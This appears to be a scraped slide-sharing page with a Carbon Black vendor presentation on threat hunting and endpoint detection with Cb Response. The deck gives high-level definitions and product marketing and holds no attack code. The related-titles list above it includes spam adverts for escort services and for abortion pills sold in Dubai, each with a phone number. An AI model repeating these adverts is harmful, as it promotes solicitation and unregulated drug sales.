Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 

Threat Hunting ve EDR Etkinliği Carbon Black Sunumu

  • 1. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL1 Threat Hunting: Fast and easy with CbR 1-Oct-18 Nagaraj Hebbar Technical Account Manager – Middle East, Turkey & Africa (META)
 CISSP, CISM
  • 2. Agenda Confidential © 2017 Carbon Black. All Rights Reserved. 01. Threat & Threat hunting - Overview 02. 03. Threat hunting demo Cb Response
  • 3. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL3 NON-MALWARE ATTACKS ON THE RISE 47%OF BREACHES USE MALWARE 53%OF BREACHES ARE NON-MALWARE MALWARE ATTACKS NON-MALWARE ATTACKS KNOWN UNKNOWN RANSOM OBFUSCATED MEMORY MACROS REMOTE LOGIN POWERSHELL 93% OF RESEARCHERS SAY NON-MALWARE ATTACKS POSE MORE BUSINESS RISK THAN MALWARE MALWARE + NON-MALWARE
  • 4. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL4 Threat vs. Vulnerability vs. Risk • Threat • Anything that can exploit a vulnerability, intentionally or accidentally, and obtain, damage, or destroy an asset • A Threat is what we are trying to protect against • Vulnerability • Weaknesses or gaps in a security program that can be exploited by threats to gain unauthorized asset to an asset • A vulnerability is a weakness or gap in our protection efforts • Risk • The potential for loss, damage or destruction of an asset as a results of a threat exploiting a vulnerability • Risk is the intersection of assets, threats and vulnerabilities
  • 5. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL5 Proactive Threat Hunting WHAT IS IT? • Proactive and iterative search for attacks • Informed by in-depth knowledge of your environment • Often hypothesis-based WHAT IS IT NOT? • Out-of-the-box detection • A checklist of indicators of compromise • Applying 3rd party threat intel feeds
  • 6. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL6 The Challenges NO REAL-TIME VISIBILITY INTO ADVANCED ATTACKS TIRED OF BEING REACTIVE NO CENTRALIZED ACCESS TO UNFILTERED DATA 91% OF ORGANIZATIONS REPORT INCREASES IN SPEED & ACCURACY OF RESPONSE DUE TO THREAT HUNTING 77% CONSIDER ENDPOINT SECURITY DATA NECESSARY IN THEIR THREAT HUNTING FEEDS The Hunter Strikes Back: The SANS 2017 Threat Hunting Survey
  • 7. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL7 ✓ Stops the headline breach ✓ Scales the hunt ✓ Integrates your defenses ✓ Gives you a community of experts How We Solve Those Challenges Advances you from monitoring to proactive threat hunting
  • 8. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL8 Detect & Respond Faster with Cb Response
  • 9. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL9 Endpoint Security Market Leader 30 of Fortune 100 3,700 Customers 14M Endpoints 13,000 Practitioners 75+ IR/MSSPs 60%+ Y/Y Growth PURPOSE BUILT FOR SOC/IR MARKET-LEADING DETECTION & RESPONSE PRO-ACTIVE THREAT HUNTING
  • 10. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL10 Cb Response: IR & Threat Hunting COMPLETE VISIBILITY PROACTIVE THREAT HUNTING REAL-TIME RESPONSE GLOBAL COMMUNITY LEVERAGE
  • 11. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL11 Complete Visibility PROCESS ACTIVITY REGISTRY ACTIVITY FILE ACTIVITY NETWORK ACTIVITY IDENTIFY ROOT CAUSE CAPTURE ALL ENDPOINT ACTIVITY AGGREGATE THREAT INTEL VISUALIZE THE ATTACK MINIMIZE RESOURCE IMPACT CONTINUOUS & CENTRALIZED RECORDING
  • 12. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL12 CUSTOMIZE WATCHLISTS CAPTURE ALL ENDPOINT ACTIVITY Proactive Threat Hunting CONSOLIDATE THREAT FEEDS OPEN APIs AND INTEGRATIONS MAKE THE NEXT ATTACK HARDER AUTOMATE THE HUNT INTEGRATE DEFENSES STOP THE “HEADLINE” BREACH LEVERAGE COMMUNITY EXPERTS
  • 13. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL13 Real-Time Response CUSTOM BANNINGENDPOINT ISOLATION LIVE RESPONSEPROCESS TERMINATION REMEDIATE INFECTED DEVICES ISOLATE INFECTED SYSTEMS PREVENT FUTURE ATTACKS COLLECT FORENSIC DATA
  • 14. I © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL14 1 Market-Leading IR & Threat Hunting COMPLETE VISIBILTY PROACTIVE THREAT HUNTING REAL-TIME RESPONSE PROVEN AT SCALE 2 3 4
  • 15. © 2017 Carbon Black. All Rights Reserved. I CONFIDENTIAL15 THANK YOU